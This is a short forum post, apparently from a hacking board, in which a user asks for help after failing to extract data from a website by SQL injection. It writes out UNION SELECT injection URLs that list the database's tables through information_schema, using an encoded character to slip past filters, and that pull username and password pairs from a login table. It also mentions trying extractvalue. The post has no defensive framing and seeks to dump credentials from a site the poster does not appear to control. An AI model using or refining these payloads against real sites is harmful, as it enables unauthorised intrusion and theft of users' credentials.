ALGORi7HM |
Beginner |
|
|
Joined: Sep 20, 2011 |
Posts: 4 |
Location: Master Boot Record |
|
|
|
|
|
|
Hi.. I was trying to inject this site
Code: | http://www.site.com/image.php?id=27 |
Code: | http://www.site.com/image.php?id=-27 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16 From %69nformation_schema.tables where table_schema = database()-- |
Finally I am not able to get data from table..
Code: | http://www.site.com/image.php?id=-27 UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 frOm login-- |
Is there any other way to extract data?
i tried extractvalue function..but same result..
Thanks in advance..[/url] |
|